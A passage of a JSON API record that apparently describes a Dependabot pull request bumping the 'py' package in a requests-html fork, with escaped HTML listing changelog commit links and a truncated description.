hashes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG...\n\n_Description has been truncated_","html_url":"https://github.com/sumonst21/requests-html/pull/6","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/sumonst21%2Frequests-html/issues/6","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/6/packages"}}]}